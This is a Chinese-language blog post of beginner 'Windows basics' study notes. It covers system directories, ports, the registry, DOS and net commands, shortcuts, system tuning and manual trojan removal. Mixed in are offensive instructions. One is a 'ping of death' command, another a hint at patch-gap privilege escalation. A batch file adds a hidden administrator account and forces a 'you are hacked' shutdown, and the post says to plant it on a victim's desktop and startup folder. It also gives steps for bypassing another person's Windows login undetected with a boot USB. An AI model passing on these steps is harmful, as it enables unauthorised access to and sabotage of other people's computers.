admin 管理员组文章数量: 887018
Windows基础
- 系统目录、服务、端口、注册表
- 常用DOS命令及批处理文件
- 常见快捷键,以及如何优化系统
- 登录密码PJ、手动清除密码
系统目录
Windows 系统安装目录
C:\Windows\system32 存放系统配置文件
C:\Windows\system32\config\SAM 存放Windows账号密码的文件,系统运行时加锁
可以采用PE进行清除密码,或将之前的SAM剪切出来,操作完成后在放回去。
C:\Windows\system32\drivers\etc\hosts 配置域名解析
用户 存放用户的家目录
希望某个用户一登录,就运行某个程序,需要放置到该用户的启动目录,例如:Win7
C:\Users\yonghu\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Starup
Program Files 程序默认安装路径 Program Files(x86)32位程序默认安装路径
PerfLogs 日志文件目录
日志分析工具,可以分析日志,具体到:IP 什么时间 入侵服务器
服务
服务是一种应用程序类型,它在后台运行,服务应用程序通常可以在本地和通过网络为用户提供一些功能,例如客户端/服务器应用程序、web服务器、数据库服务器以及其他一些基于服务器的应用程序。
服务的作用:
服务决定了计算机的一些功能是否被启用;不同的服务对应的功能不同;通过计算机提供的服务可以有效的实现资源共享
服务通过端口和IP访问,或者域名访问
打开服务:
徽标键+r 打开运行,输入services.msc
服务器管理器中打开
常见服务:
Web DNS DHCP 邮件 Telnet ssh FTP smb
共享文件夹smb服务就开启了,访问共享: \\192.168.1.1
Telnet到服务器端 可以进行登录
端口
分为三类:公认端口;注册端口;动态和私有端口
通过IP+端口 区分不同的服务
常见端口
HTTP常用端口:80/8080/3128/8081/9080
FTP端口:21
Telnet端口:23
TFTP端口:69/udp
Ssh、SCP、端口重定向,默认端口:22/tcp
SMTP默认端口:25/tcp
POP3默认端口:110/tcp
TOMCAT默认端口:8080
Windows远程登录端口:3389
Oracle 默认端口:1521
SqlServer 数据库:1433
QQ默认端口:1080/udp
通过端口可以做什么?
信息搜集;
目标探测;
服务判断;
系统判断;根据服务判断os系统
系统角色分析;
注册表(regedit)
注册表是Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息。通过修改注册表,来改变服务器的任何配置效果
注册表结构
- HKEY_CLASSES_ROOT 管理文件系统
- HKEY_CURRENT_USER 管理系统当前的用户信息
- HKEY_LOCAL_MACHINE 管理当前系统硬件配置
- HKEY_USERS 管理系统的用户信息
- HKEY_CURRENT_CONFIG 管理当前用户的系统配置
利用注册表防病毒
不少计算机系统感染病毒后,可能会在注册表中做修改
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
DOS命令
color 改变cmd颜色
ping -t -l 65550 ip 死亡之ping (发送大于64K的文件,并一直ping)
根据TTL值判断对端服务器类型 64Linux或者128 Windows
ipconfig 查看ip ipconfig /all 查看详细IP信息
ipconfig /release 释放IP
ipconfig /renew 重新获取IP
systeminfo 查看系统信息
根据已经安装补丁的名称和提权的补丁对比,根据没有安装的补丁进行提权。
arp -a 查看所有接口在局域网内的IP
net view 查看局域网内其他计算机名称
shutdown -s -t 180 -c “你被黑了,系统马上关机”
-s 关机 -r重启 -t 多少时间 -c “” 提示对话框 -a 取消本次任务
dir 查看目录
cd 切换目录
start www.baidu 打开网页
copy con c:\123.txt 在c:\创建123.txt文件
hello Word
Ctrl+z 回车 结束输入
start c:\123.txt 打开123.txt.文件
type c:\123.txt 查看123.txt.文件
md 目录名 创建目录
rd 目录名 删除目录
ren 原文件名 新文件名 重命名文件
del 文件名 删除文件
copy 文件名 复制文件
move 移动文件
tree 树形列出文件夹结构
Telnet
net use k: \\192.168.1.1\c$
将远端192.168.1.1的C盘映射到本地,作为K盘
net use k: \\192.168.1.1\c$ /del
去除远端192.168.1.1的C盘映射到本地的K盘
net start 查看开启了那些服务
net start 服务名 开启服务
net stop 服务名 关闭服务
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有那些用户
net user 账户名 查看账户的属性
net localGroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限
net user guest 12345 用guest用户登陆后将密码改为12345
net password 密码 更改系统登录密码
net share 查看开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除c: 共享
netstat -a 查看开启了那些端口 -n 查看端口的网络连接状况 -v 查看正在进行的工作
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有计划任务
at 时间 命令 设置计划任务在某个时间执行某个命令
例如: at 16:00 shutdown -s
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H或+A +R +S +H 去掉(添加)某文件的 存档 只读 系统 隐藏 属性;用+则是添加某属性
附加内容:
批处理文件:是dos命令的组合文件,写在批处理文件的命令会被逐一执行。后缀名为.bat
例如:
copy con 123.bat
net user cracer 123 /add
net localgroup administrators cracer /add
shutdown -s -t 180 -c “hello man you are hacked by cracer”
ctrl+z
回车
然后将该文件放在对方的桌面和启动项里面,打开或开机会启动该文件
可以用shutdown -a 终止shutdown -s -t 180 命令
Windows快捷键
F1 显示当前程序或者Windows的帮助内容
F2 当你选中一个文件的话,这意味着重命名
F3 当你在桌面上的时候是打开“查找:所有文件” 对话框
Ctrl+F4 关闭当前应用程序中的当前文本(如Word中)
F5 刷新
Ctrl+F5 强制刷新
Ctrl+F6 切换到当前应用程序中的下一个文本
F10或Alt 激活当前程序的菜单栏
Windows键或者Ctrl+ESC 打开开始菜单栏
Ctrl+Alt+delete 关闭桌面
delete 删除被选项目,如果是文件,将被放入回收站
shift+delete 删除被选项目,如果是文件,强制删除,不会放入回收站
Ctrl+N 新建一个新的文件
Ctrl+O 打开“打开文件”对话框
Ctrl+P 打开“打印”对话框
Ctrl+S 保存当前操作的文件
Ctrl+X 剪切被选择的项目到剪切板
Ctrl+insert或Ctrl+C 复制被选择的项目到剪切板
shift+insert或Ctrl+V 粘贴剪切板中的项目
Alt+backspace或Ctrl+Z 撤销上一步的操作
Alt+shift+backspace 重做上一步被撤销的操作
Windows键+M 最小化所有被打开的窗口
Windows键+Ctrl+M 重新将恢复上一项操作前窗口的大小和位置
Windows键+E 打开资源管理器
Windows键+D 最小化或还原所有窗口
Windows键+F 打开“查找:所有文件”对话框
Windows键+R 打开“运行”对话框
Windows键+break 打开“系统属性”对话框
Windows键+Ctrl+F 打开“查找:计算机”对话框
shift+F10或鼠标右击 打开当前活动项目的快捷菜单
shift 在打开Word的时候按下不放,可以跳过自启动的宏
Alt+F4 关闭当前应用程序
Alt+spacebar 打开程序最左上角的菜单
Alt+tab 切换当前程序
Alt+ESC 切换当前程序
Alt+enter 将Windows下运行的MSDOS窗口在窗口和全屏状态切换
printscreen 将当前屏幕以图像方式拷贝到剪切板
ESC 取消当前任务
系统优化
a.修改启动项
b.加快系统启动速度
c.提高窗口切换速度
d.实用工具优化
修改启动项
msconfig 打开系统配置窗口,在“启动”页签修改
加快系统启动速度
msconfig 打开系统配置窗口,在“引导”页签,选择高级选项,修改处理器数和最大内存
提高窗口切换速度
右击计算机属性---性能信息和工具---调整视觉效果
先点击让Windows选择计算机的最佳设置---再点击自定义---把最后的勾选去掉---确定
实用工具优化
360、鲁大师、系统优化大师
Windows登录密码清除
1、下载“电脑店U盘启动制作工具”。
如:百度搜索“电脑店U盘启动制作工具”即可下载
2、安装“电脑店U盘启动制作工具”。
3、双击“电脑店U盘启动制作工具”的EXE文件,然后选择解压路径,根据提示完成软件解压
4、备份U盘数据,在制作U盘启动过程中会删除U盘上的所有数据,且不可恢复,故此需要备份U盘数据。
5、开始制作U盘启动
(1)运行“电脑店U盘启动制作工具软件”;
(2)点击“开始制作U盘启动”;
(3)确定插入U盘,默认其分配隐藏空间,选择所需模式,勾选NTFS(否),
(4)点击“开始制作”---“确定”然后耐心等待。
注:勾选NTFS是保证制作后的U盘格式为NTFS,支持拷贝大于4G的单个文件。
6、确定要用电脑模拟测试U盘启动情况。
7、当U盘启动制作完毕后,会有信息提示询问是否“要用‘电脑模拟器’测试U盘的启动情况”时点击【是】
8、把U盘插在电脑上,进入BIOS中设置从U盘启动
9、选择“运行Windows登录密码破解菜单”,按enter键回车。
10、这里头有两个选项,如果是自己的电脑,建议选择“清除Windows登录密码”,清除之后密码没了,进入系统重新设置;选择“绕过Windows登录密码”,只允许登录一次,一次过后又要验证密码,对于想登录别人电脑,又不想打草惊蛇再适合不过了,目前假定为第一种。
11、Windows登录密码是以加密的形式存在在sam文件中,无法解密,只能清除或者绕过。保守起见,选择2,搜索所有分区,寻找Sam文件。
12、找到Sam文件后,按enter键继续
13、根据用户序号,选择清除密码。
14、按Y键确定清除。上下键移动光标,空格键选中。
15、至此,就把密码清除了,按任意键回到上一级菜单,可以选择其他的用户在清除。
手动清除木马
查找开机启动项
点击开始----所有程序----启动
MSConfig---启动 用%显示系统安装的盘,读取开机启动注册表;
查看注册表:
HKEY_LOACL_MACHINE\SOFTWARE\Microsoft\Windows\currentversion\run
HKEY_LOACL_MACHINE\SOFTWARE\Microsoft\Windows\currentversion\runonce
HKEY_LOACL_MACHINE\SOFTWARE\Microsoft\Windows\currentversion\runonceex
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\currentversion\run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\currentversion\runonce
查询服务 services.msc 查看异常的服务
查看网络连接端口 netstat -ano 查看异常的连接
版权声明:本文标题:学习笔记之Windows基础 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1729080369h1315273.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论